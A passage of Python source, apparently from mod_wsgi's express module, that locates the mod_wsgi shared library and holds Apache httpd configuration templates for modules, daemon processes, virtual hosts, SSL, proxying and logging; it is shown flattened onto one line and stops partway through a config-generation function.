httpd.serve_forever()
__init__.py
from __future__ import print_function, division, absolute_import import os import sys import shutil import subprocess import optparse import math import signal import threading import atexit import types import re import pprint import time import traceback import locale import inspect import getpass import tempfile import copy import posixpath try: import Queue as queue except ImportError: import queue from . import apxs_config _py_version = '%s%s' % sys.version_info[:2] _py_soabi = '' _py_soext = '.so' _py_dylib = '' try: import sysconfig import distutils.sysconfig _py_soabi = sysconfig.get_config_var('SOABI') _py_soext = sysconfig.get_config_var('EXT_SUFFIX') if _py_soext is None: _py_soext = sysconfig.get_config_var('SO') if (sysconfig.get_config_var('WITH_DYLD') and sysconfig.get_config_var('LIBDIR') and sysconfig.get_config_var('LDLIBRARY')): _py_dylib = posixpath.join(sysconfig.get_config_var('LIBDIR'), sysconfig.get_config_var('LDLIBRARY')) if not os.path.exists(_py_dylib): _py_dylib = '' except ImportError: pass MOD_WSGI_SO = 'mod_wsgi-py%s%s' % (_py_version, _py_soext) MOD_WSGI_SO = posixpath.join(posixpath.dirname(__file__), MOD_WSGI_SO) if not os.path.exists(MOD_WSGI_SO) and _py_soabi: MOD_WSGI_SO = 'mod_wsgi-py%s.%s%s' % (_py_version, _py_soabi, _py_soext) MOD_WSGI_SO = posixpath.join(posixpath.dirname(__file__), MOD_WSGI_SO) if not os.path.exists(MOD_WSGI_SO) and os.name == 'nt': MOD_WSGI_SO = 'mod_wsgi%s' % distutils.sysconfig.get_config_var('EXT_SUFFIX') MOD_WSGI_SO = os.path.join(os.path.dirname(__file__), MOD_WSGI_SO) MOD_WSGI_SO = MOD_WSGI_SO.replace('\\', '/') def where(): return MOD_WSGI_SO def default_run_user(): if os.name == 'nt': return '#0' try: import pwd uid = os.getuid() return pwd.getpwuid(uid).pw_name except KeyError: return '#%d' % uid def default_run_group(): if os.name == 'nt': return '#0' try: import pwd uid = os.getuid() entry = pwd.getpwuid(uid) except KeyError: return '#%d' % uid try: import grp gid = entry.pw_gid return grp.getgrgid(gid).gr_name except KeyError: return '#%d' % gid def find_program(names, default=None, paths=[]): for name in names: for path in os.environ['PATH'].split(':') + paths: program = posixpath.join(path, name) if os.path.exists(program): return program return default def find_mimetypes(): if os.name == 'nt': return posixpath.join(posixpath.dirname(posixpath.dirname( apxs_config.HTTPD)), 'conf', 'mime.types') else: import mimetypes for name in mimetypes.knownfiles: if os.path.exists(name): return name else: return '/dev/null' SHELL = find_program(['bash', 'sh'], ['/usr/local/bin']) APACHE_GENERAL_CONFIG = """ <IfModule !version_module> LoadModule version_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_version.so' </IfModule> ServerName %(host)s ServerRoot '%(server_root)s' PidFile '%(pid_file)s' <IfVersion >= 2.4> DefaultRuntimeDir '%(server_root)s' </IfVersion> ServerTokens ProductOnly ServerSignature Off <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> User ${MOD_WSGI_USER} Group ${MOD_WSGI_GROUP} </IfDefine> <IfDefine MOD_WSGI_WITH_LISTENER_HOST> Listen %(host)s:%(port)s </IfDefine> <IfDefine !MOD_WSGI_WITH_LISTENER_HOST> Listen %(port)s </IfDefine> <IfVersion < 2.4> LockFile '%(server_root)s/accept.lock' </IfVersion> <IfVersion >= 2.4> <IfDefine MOD_WSGI_WITH_PHP5> <IfModule !mpm_event_module> <IfModule !mpm_worker_module> <IfModule !mpm_prefork_module> <IfDefine MOD_WSGI_MPM_EXISTS_PREFORK_MODULE> LoadModule mpm_prefork_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_prefork.so' </IfDefine> </IfModule> </IfModule> </IfModule> </IfDefine> </IfVersion> <IfVersion >= 2.4> <IfModule !mpm_event_module> <IfModule !mpm_worker_module> <IfModule !mpm_prefork_module> <IfDefine MOD_WSGI_MPM_ENABLE_EVENT_MODULE> LoadModule mpm_event_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_event.so' </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_WORKER_MODULE> LoadModule mpm_worker_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_worker.so' </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_PREFORK_MODULE> LoadModule mpm_prefork_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mpm_prefork.so' </IfDefine> </IfModule> </IfModule> </IfModule> </IfVersion> <IfDefine MOD_WSGI_WITH_HTTP2> LoadModule http2_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_http2.so' </IfDefine> <IfVersion >= 2.4> <IfModule !access_compat_module> LoadModule access_compat_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_access_compat.so' </IfModule> <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> <IfModule !unixd_module> LoadModule unixd_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_unixd.so' </IfModule> </IfDefine> <IfModule !authn_core_module> LoadModule authn_core_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authn_core.so' </IfModule> <IfModule !authz_core_module> LoadModule authz_core_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_core.so' </IfModule> </IfVersion> <IfModule !authz_host_module> LoadModule authz_host_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_host.so' </IfModule> <IfModule !mime_module> LoadModule mime_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_mime.so' </IfModule> <IfModule !rewrite_module> LoadModule rewrite_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_rewrite.so' </IfModule> <IfModule !alias_module> LoadModule alias_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_alias.so' </IfModule> <IfModule !dir_module> LoadModule dir_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_dir.so' </IfModule> <IfModule !env_module> LoadModule env_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_env.so' </IfModule> <IfModule !headers_module> LoadModule headers_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_headers.so' </IfModule> <IfModule !filter_module> LoadModule filter_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_filter.so' </IfModule> <IfDefine MOD_WSGI_DIRECTORY_LISTING> <IfModule !autoindex_module> LoadModule autoindex_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_autoindex.so' </IfModule> </IfDefine> <IfVersion >= 2.2.15> <IfModule !reqtimeout_module> LoadModule reqtimeout_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_reqtimeout.so' </IfModule> </IfVersion> <IfDefine MOD_WSGI_COMPRESS_RESPONSES> <IfModule !deflate_module> LoadModule deflate_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_deflate.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_AUTH_USER> <IfModule !auth_basic_module> LoadModule auth_basic_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_auth_basic.so' </IfModule> <IfModule !auth_digest_module> LoadModule auth_digest_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_auth_digest.so' </IfModule> <IfModule !authz_user_module> LoadModule authz_user_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_authz_user.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_WITH_PROXY> <IfModule !proxy_module> LoadModule proxy_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_proxy.so </IfModule> <IfModule !proxy_http_module> LoadModule proxy_http_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_proxy_http.so </IfModule> </IfDefine> <IfModule mpm_prefork_module> <IfDefine MOD_WSGI_WITH_PHP5> <IfModule !php5_module> Loadmodule php5_module '${MOD_WSGI_MODULES_DIRECTORY}/libphp5.so' </IfModule> AddHandler application/x-httpd-php .php </IfDefine> </IfModule> <IfDefine MOD_WSGI_LOAD_PYTHON_DYLIB> LoadFile '%(python_dylib)s' </IfDefine> LoadModule wsgi_module '%(mod_wsgi_so)s' <IfDefine MOD_WSGI_SERVER_METRICS> <IfModule !status_module> LoadModule status_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_status.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_CGID_SCRIPT> <IfModule !cgid_module> LoadModule cgid_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_cgid.so' </IfModule> </IfDefine> <IfDefine MOD_WSGI_CGI_SCRIPT> <IfModule !cgi_module> LoadModule cgi_module '${MOD_WSGI_MODULES_DIRECTORY}/mod_cgi.so' </IfModule> </IfDefine> <IfVersion < 2.4> DefaultType text/plain </IfVersion> TypesConfig '%(mime_types)s' HostnameLookups Off MaxMemFree 64 Timeout %(socket_timeout)s ListenBacklog %(server_backlog)s <IfDefine MOD_WSGI_WITH_HTTP2> Protocols h2 h2c http/1.1 </IfDefine> <IfVersion >= 2.2.15> RequestReadTimeout %(request_read_timeout)s </IfVersion> LimitRequestBody %(limit_request_body)s <Directory /> AllowOverride None <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> </Directory> WSGIPythonHome '%(python_home)s' WSGIVerboseDebugging '%(verbose_debugging_flag)s' <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> <IfDefine MOD_WSGI_WITH_SOCKET_PREFIX> WSGISocketPrefix %(socket_prefix)s/wsgi </IfDefine> <IfDefine !MOD_WSGI_WITH_SOCKET_PREFIX> WSGISocketPrefix %(server_root)s/wsgi </IfDefine> WSGISocketRotation Off </IfDefine> <IfDefine EMBEDDED_MODE> MaxConnectionsPerChild %(maximum_requests)s </IfDefine> <IfDefine DESTROY_INTERPRETER> WSGIDestroyInterpreter On </IfDefine> <IfDefine !DESTROY_INTERPRETER> WSGIDestroyInterpreter Off </IfDefine> <IfDefine !ONE_PROCESS> <IfDefine !EMBEDDED_MODE> WSGIRestrictEmbedded On <IfDefine MOD_WSGI_MULTIPROCESS> WSGIDaemonProcess %(host)s:%(port)s \\ display-name='%(daemon_name)s' \\ home='%(working_directory)s' \\ processes=%(processes)s \\ threads=%(threads)s \\ maximum-requests=%(maximum_requests)s \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ listen-backlog=%(daemon_backlog)s \\ queue-timeout=%(queue_timeout)s \\ socket-timeout=%(socket_timeout)s \\ connect-timeout=%(connect_timeout)s \\ request-timeout=%(request_timeout)s \\ inactivity-timeout=%(inactivity_timeout)s \\ startup-timeout=%(startup_timeout)s \\ deadlock-timeout=%(deadlock_timeout)s \\ graceful-timeout=%(graceful_timeout)s \\ eviction-timeout=%(eviction_timeout)s \\ restart-interval=%(restart_interval)s \\ cpu-time-limit=%(cpu_time_limit)s \\ shutdown-timeout=%(shutdown_timeout)s \\ send-buffer-size=%(send_buffer_size)s \\ receive-buffer-size=%(receive_buffer_size)s \\ header-buffer-size=%(header_buffer_size)s \\ response-buffer-size=%(response_buffer_size)s \\ response-socket-timeout=%(response_socket_timeout)s \\ server-metrics=%(server_metrics_flag)s </IfDefine> <IfDefine !MOD_WSGI_MULTIPROCESS> WSGIDaemonProcess %(host)s:%(port)s \\ display-name='%(daemon_name)s' \\ home='%(working_directory)s' \\ threads=%(threads)s \\ maximum-requests=%(maximum_requests)s \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ listen-backlog=%(daemon_backlog)s \\ queue-timeout=%(queue_timeout)s \\ socket-timeout=%(socket_timeout)s \\ connect-timeout=%(connect_timeout)s \\ request-timeout=%(request_timeout)s \\ inactivity-timeout=%(inactivity_timeout)s \\ startup-timeout=%(startup_timeout)s \\ deadlock-timeout=%(deadlock_timeout)s \\ graceful-timeout=%(graceful_timeout)s \\ eviction-timeout=%(eviction_timeout)s \\ restart-interval=%(restart_interval)s \\ cpu-time-limit=%(cpu_time_limit)s \\ shutdown-timeout=%(shutdown_timeout)s \\ send-buffer-size=%(send_buffer_size)s \\ receive-buffer-size=%(receive_buffer_size)s \\ response-buffer-size=%(response_buffer_size)s \\ response-socket-timeout=%(response_socket_timeout)s \\ server-metrics=%(server_metrics_flag)s </IfDefine> </IfDefine> </IfDefine> WSGICallableObject '%(callable_object)s' WSGIPassAuthorization On WSGIMapHEADToGET %(map_head_to_get)s <IfDefine MOD_WSGI_DISABLE_RELOADING> WSGIScriptReloading Off </IfDefine> <IfDefine EMBEDDED_MODE> <IfDefine MOD_WSGI_WITH_PYTHON_PATH> WSGIPythonPath '%(python_path)s' </IfDefine> </IfDefine> <IfDefine ONE_PROCESS> WSGIRestrictStdin Off <IfDefine MOD_WSGI_WITH_PYTHON_PATH> WSGIPythonPath '%(python_path)s' </IfDefine> </IfDefine> <IfDefine MOD_WSGI_SERVER_METRICS> ExtendedStatus On </IfDefine> WSGIServerMetrics %(server_metrics_flag)s <IfDefine MOD_WSGI_SERVER_STATUS> <Location /server-status> SetHandler server-status <IfVersion < 2.4> Order deny,allow Deny from all Allow from localhost </IfVersion> <IfVersion >= 2.4> Require all denied Require host localhost </IfVersion> </Location> </IfDefine> <IfDefine MOD_WSGI_KEEP_ALIVE> KeepAlive On KeepAliveTimeout %(keep_alive_timeout)s </IfDefine> <IfDefine !MOD_WSGI_KEEP_ALIVE> KeepAlive Off </IfDefine> <IfDefine MOD_WSGI_ENABLE_SENDFILE> EnableSendfile On WSGIEnableSendfile On </IfDefine> <IfDefine MOD_WSGI_COMPRESS_RESPONSES> AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE text/javascript AddOutputFilterByType DEFLATE application/xhtml+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/json </IfDefine> <IfDefine MOD_WSGI_ROTATE_LOGS> ErrorLog "|%(rotatelogs_executable)s \\ %(error_log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> ErrorLog "%(error_log_file)s" </IfDefine> LogLevel %(log_level)s <IfDefine MOD_WSGI_ERROR_LOG_FORMAT> ErrorLogFormat "%(error_log_format)s" </IfDefine> <IfDefine MOD_WSGI_ACCESS_LOG> <IfModule !log_config_module> LoadModule log_config_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_log_config.so </IfModule> LogFormat "%%h %%l %%u %%t \\"%%r\\" %%>s %%b" common LogFormat "%%h %%l %%u %%t \\"%%r\\" %%>s %%b \\"%%{Referer}i\\" \\"%%{User-agent}i\\"" combined LogFormat "%(access_log_format)s" custom <IfDefine MOD_WSGI_ROTATE_LOGS> CustomLog "|%(rotatelogs_executable)s \\ %(access_log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" %(log_format_nickname)s </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> CustomLog "%(access_log_file)s" %(log_format_nickname)s </IfDefine> </IfDefine> <IfDefine MOD_WSGI_CHUNKED_REQUEST> WSGIChunkedRequest On </IfDefine> <IfDefine MOD_WSGI_WITH_PROXY_HEADERS> WSGITrustedProxyHeaders %(trusted_proxy_headers)s </IfDefine> <IfDefine MOD_WSGI_WITH_TRUSTED_PROXIES> WSGITrustedProxies %(trusted_proxies)s </IfDefine> <IfDefine MOD_WSGI_WITH_HTTPS> <IfModule !ssl_module> LoadModule ssl_module ${MOD_WSGI_MODULES_DIRECTORY}/mod_ssl.so </IfModule> </IfDefine> <IfModule mpm_prefork_module> <IfDefine !ONE_PROCESS> ServerLimit %(prefork_server_limit)s StartServers %(prefork_start_servers)s MaxClients %(prefork_max_clients)s MinSpareServers %(prefork_min_spare_servers)s MaxSpareServers %(prefork_max_spare_servers)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 StartServers 1 MaxClients 1 MinSpareServers 1 MaxSpareServers 1 </IfDefine> MaxRequestsPerChild 0 </IfModule> <IfModule mpm_worker_module> <IfDefine !ONE_PROCESS> ServerLimit %(worker_server_limit)s ThreadLimit %(worker_thread_limit)s StartServers %(worker_start_servers)s MaxClients %(worker_max_clients)s MinSpareThreads %(worker_min_spare_threads)s MaxSpareThreads %(worker_max_spare_threads)s ThreadsPerChild %(worker_threads_per_child)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 ThreadLimit 1 StartServers 1 MaxClients 1 MinSpareThreads 1 MaxSpareThreads 1 ThreadsPerChild 1 </IfDefine> MaxRequestsPerChild 0 ThreadStackSize 262144 </IfModule> <IfModule mpm_event_module> <IfDefine !ONE_PROCESS> ServerLimit %(worker_server_limit)s ThreadLimit %(worker_thread_limit)s StartServers %(worker_start_servers)s MaxClients %(worker_max_clients)s MinSpareThreads %(worker_min_spare_threads)s MaxSpareThreads %(worker_max_spare_threads)s ThreadsPerChild %(worker_threads_per_child)s </IfDefine> <IfDefine ONE_PROCESS> ServerLimit 1 ThreadLimit 1 StartServers 1 MaxClients 1 MinSpareThreads 1 MaxSpareThreads 1 ThreadsPerChild 1 </IfDefine> MaxRequestsPerChild 0 ThreadStackSize 262144 </IfModule> <IfDefine !MOD_WSGI_VIRTUAL_HOST> <IfVersion < 2.4> NameVirtualHost *:%(port)s </IfVersion> <VirtualHost _default_:%(port)s> </VirtualHost> </IfDefine> <IfDefine MOD_WSGI_VIRTUAL_HOST> <IfVersion < 2.4> NameVirtualHost *:%(port)s </IfVersion> <VirtualHost _default_:%(port)s> <Location /> <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> <IfDefine MOD_WSGI_ALLOW_LOCALHOST> Allow from localhost </IfDefine> </Location> </VirtualHost> <IfDefine !MOD_WSGI_HTTPS_ONLY> <VirtualHost *:%(port)s> ServerName %(server_name)s <IfDefine MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(port)s> ServerName %(parent_domain)s Redirect permanent / http://%(server_name)s:%(port)s/ </VirtualHost> </IfDefine> </IfDefine> <IfDefine MOD_WSGI_HTTPS_ONLY> <VirtualHost *:%(port)s> ServerName %(server_name)s <IfDefine MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> RewriteEngine On RewriteCond %%{HTTPS} off RewriteRule (.*) https://%(server_name)s:%(https_port)s%%{REQUEST_URI} </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(port)s> ServerName %(parent_domain)s RewriteEngine On RewriteCond %%{HTTPS} off RewriteRule (.*) https://%(server_name)s:%(https_port)s%%{REQUEST_URI} </VirtualHost> </IfDefine> </IfDefine> </IfDefine> <IfDefine MOD_WSGI_VIRTUAL_HOST> <IfDefine MOD_WSGI_WITH_HTTPS> <IfDefine MOD_WSGI_WITH_LISTENER_HOST> Listen %(host)s:%(https_port)s </IfDefine> <IfDefine !MOD_WSGI_WITH_LISTENER_HOST> Listen %(https_port)s </IfDefine> <IfVersion < 2.4> NameVirtualHost *:%(https_port)s </IfVersion> <VirtualHost _default_:%(https_port)s> <Location /> <IfVersion < 2.4> Order deny,allow Deny from all </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> <IfDefine MOD_WSGI_ALLOW_LOCALHOST> Allow from localhost </IfDefine> </Location> SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> </VirtualHost> <VirtualHost *:%(https_port)s> ServerName %(server_name)s <IfDefine MOD_WSGI_SERVER_ALIAS> ServerAlias %(server_aliases)s </IfDefine> SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> <IfDefine MOD_WSGI_HTTPS_ONLY> <IfDefine MOD_WSGI_HSTS_POLICY> Header set Strict-Transport-Security %(hsts_policy)s </IfDefine> </IfDefine> <IfDefine MOD_WSGI_SSL_ENVIRONMENT> SSLOptions +StdEnvVars </IfDefine> </VirtualHost> <IfDefine MOD_WSGI_REDIRECT_WWW> <VirtualHost *:%(https_port)s> ServerName %(parent_domain)s Redirect permanent / https://%(server_name)s:%(https_port)s/ SSLEngine On SSLCertificateFile %(ssl_certificate_file)s SSLCertificateKeyFile %(ssl_certificate_key_file)s <IfDefine MOD_WSGI_VERIFY_CLIENT> SSLCACertificateFile %(ssl_ca_certificate_file)s SSLVerifyClient none </IfDefine> <IfDefine MOD_WSGI_CERTIFICATE_CHAIN> SSLCertificateChainFile %(ssl_certificate_chain_file)s </IfDefine> </VirtualHost> </IfDefine> </IfDefine> </IfDefine> DocumentRoot '%(document_root)s' AccessFileName .htaccess <Directory '%(server_root)s'> AllowOverride %(allow_override)s <Files handler.wsgi> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Files> </Directory> <Directory '%(document_root)s'> AllowOverride %(allow_override)s <IfDefine MOD_WSGI_DIRECTORY_INDEX> DirectoryIndex %(directory_index)s </IfDefine> <IfDefine MOD_WSGI_DIRECTORY_LISTING> Options +Indexes </IfDefine> <IfDefine MOD_WSGI_CGI_SCRIPT> Options +ExecCGI </IfDefine> <IfDefine MOD_WSGI_CGID_SCRIPT> Options +ExecCGI </IfDefine> RewriteEngine On Include %(rewrite_rules)s <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> <Directory '%(document_root)s%(mount_point)s'> <IfDefine !MOD_WSGI_STATIC_ONLY> RewriteCond %%{REQUEST_FILENAME} !-f <IfDefine MOD_WSGI_DIRECTORY_INDEX> RewriteCond %%{REQUEST_FILENAME} !-d </IfDefine> <IfDefine MOD_WSGI_SERVER_STATUS> RewriteCond %%{REQUEST_URI} !/server-status </IfDefine> RewriteRule .* - [H=wsgi-handler] </IfDefine> </Directory> <IfDefine MOD_WSGI_ERROR_OVERRIDE> WSGIErrorOverride On </IfDefine> <IfDefine MOD_WSGI_HOST_ACCESS> <Location /> WSGIAccessScript '%(host_access_script)s' </Location> </IfDefine> <IfDefine MOD_WSGI_AUTH_USER> <Location /> AuthType %(auth_type)s AuthName '%(host)s:%(port)s' Auth%(auth_type)sProvider wsgi WSGIAuthUserScript '%(auth_user_script)s' <IfDefine MOD_WSGI_AUTH_GROUP> WSGIAuthGroupScript '%(auth_group_script)s' </IfDefine> <IfVersion < 2.4> Require valid-user <IfDefine MOD_WSGI_AUTH_GROUP> Require wsgi-group '%(auth_group)s' </IfDefine> </IfVersion> <IfVersion >= 2.4> <RequireAll> Require valid-user <IfDefine MOD_WSGI_AUTH_GROUP> Require wsgi-group '%(auth_group)s' </IfDefine> </RequireAll> </IfVersion> </Location> </IfDefine> <IfDefine !ONE_PROCESS> <IfDefine !EMBEDDED_MODE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} </IfDefine> </IfDefine> <IfDefine EMBEDDED_MODE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} </IfDefine> <IfDefine ONE_PROCESS> <IfDefine !MOD_WSGI_MPM_ENABLE_WINNT_MODULE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ process-group='%%{GLOBAL}' application-group=%%{GLOBAL} </IfDefine> <IfDefine MOD_WSGI_MPM_ENABLE_WINNT_MODULE> WSGIHandlerScript wsgi-handler '%(server_root)s/handler.wsgi' \\ application-group=%%{GLOBAL} WSGIImportScript '%(server_root)s/handler.wsgi' \\ application-group=%%{GLOBAL} </IfDefine> </IfDefine> """ APACHE_IGNORE_ACTIVITY_CONFIG = """ <Location '%(url)s'> WSGIIgnoreActivity On </Location> """ APACHE_PROXY_PASS_MOUNT_POINT_CONFIG = """ ProxyPass '%(mount_point)s' '%(url)s' ProxyPassReverse '%(mount_point)s' '%(url)s' <Location '%(mount_point)s'> RewriteEngine On RewriteRule .* - [E=SERVER_PORT:%%{SERVER_PORT},NE] RequestHeader set X-Forwarded-Port %%{SERVER_PORT}e RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </Location> """ APACHE_PROXY_PASS_MOUNT_POINT_SLASH_CONFIG = """ ProxyPass '%(mount_point)s/' '%(url)s/' ProxyPassReverse '%(mount_point)s/' '%(url)s/' <Location '%(mount_point)s/'> RewriteEngine On RewriteRule .* - [E=SERVER_PORT:%%{SERVER_PORT},NE] RequestHeader set X-Forwarded-Port %%{SERVER_PORT}e RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </Location> <LocationMatch '^%(mount_point)s$'> RewriteEngine On RewriteRule - http://%%{HTTP_HOST}%%{REQUEST_URI}/ [R=302,L] </LocationMatch> """ APACHE_PROXY_PASS_HOST_CONFIG = """ <VirtualHost *:%(port)s> ServerName %(host)s ProxyPass / '%(url)s' ProxyPassReverse / '%(url)s' RequestHeader set X-Forwarded-Port %(port)s RewriteEngine On RewriteCond %%{HTTPS} on RewriteRule .* - [E=URL_SCHEME:https,NE] RequestHeader set X-Forwarded-Scheme %%{URL_SCHEME}e env=URL_SCHEME </VirtualHost> """ APACHE_ALIAS_DIRECTORY_CONFIG = """ Alias '%(mount_point)s' '%(directory)s' <Directory '%(directory)s'> AllowOverride %(allow_override)s <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> """ APACHE_ALIAS_FILENAME_CONFIG = """ Alias '%(mount_point)s' '%(directory)s/%(filename)s' <Directory '%(directory)s'> <Files '%(filename)s'> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Files> </Directory> """ APACHE_ALIAS_DOCUMENTATION = """ Alias /__wsgi__/docs '%(documentation_directory)s' Alias /__wsgi__/images '%(images_directory)s' <Directory '%(documentation_directory)s'> DirectoryIndex index.html <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> <Directory '%(images_directory)s'> <IfVersion < 2.4> Order allow,deny Allow from all </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </Directory> """ APACHE_VERIFY_CLIENT_CONFIG = """ <IfDefine MOD_WSGI_VERIFY_CLIENT> <Location '%(path)s'> SSLVerifyClient require SSLVerifyDepth 1 </Location> </IfDefine> """ APACHE_ERROR_DOCUMENT_CONFIG = """ ErrorDocument '%(status)s' '%(document)s' """ APACHE_SETENV_CONFIG = """ SetEnv '%(name)s' '%(value)s' """ APACHE_PASSENV_CONFIG = """ PassEnv '%(name)s' """ APACHE_HANDLER_SCRIPT_CONFIG = """ WSGIHandlerScript wsgi-resource '%(server_root)s/resource.wsgi' \\ process-group='%(host)s:%(port)s' application-group=%%{GLOBAL} """ APACHE_HANDLER_CONFIG = """ AddHandler %(handler)s %(extension)s """ APACHE_INCLUDE_CONFIG = """ Include '%(filename)s' """ APACHE_TOOLS_CONFIG = """ WSGIDaemonProcess express display-name=%%{GROUP} threads=1 server-metrics=On """ APACHE_METRICS_CONFIG = """ WSGIImportScript '%(server_root)s/server-metrics.py' \\ process-group=express application-group=server-metrics """ APACHE_SERVICE_CONFIG = """ WSGIDaemonProcess 'service:%(name)s' \\ display-name=%%{GROUP} \\ user='%(user)s' \\ group='%(group)s' \\ home='%(working_directory)s' \\ threads=0 \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ server-metrics=%(server_metrics_flag)s WSGIImportScript '%(script)s' \\ process-group='service:%(name)s' \\ application-group=%%{GLOBAL} """ APACHE_SERVICE_WITH_LOG_CONFIG = """ <VirtualHost *:%(port)s> <IfDefine MOD_WSGI_ROTATE_LOGS> ErrorLog "|%(rotatelogs_executable)s \\ %(log_directory)s/%(log_file)s.%%Y-%%m-%%d-%%H_%%M_%%S %(max_log_size)sM" </IfDefine> <IfDefine !MOD_WSGI_ROTATE_LOGS> ErrorLog "%(log_directory)s/%(log_file)s" </IfDefine> WSGIDaemonProcess 'service:%(name)s' \\ display-name=%%{GROUP} \\ user='%(user)s' \\ group='%(group)s' \\ home='%(working_directory)s' \\ threads=0 \\ python-path='%(python_path)s' \\ python-eggs='%(python_eggs)s' \\ lang='%(lang)s' \\ locale='%(locale)s' \\ server-metrics=%(server_metrics_flag)s WSGIImportScript '%(script)s' \\ process-group='service:%(name)s' \\ application-group=%%{GLOBAL} </VirtualHost> """ def generate_apache_config(options): with open(options['httpd_conf'], 'w') as fp: print(APACHE_GENERAL_CONFIG % options, file=fp) if options['ignore_activity']: for url in options['ignore_activity']: print(APACHE_IGNORE_ACTIVITY_CONFIG % 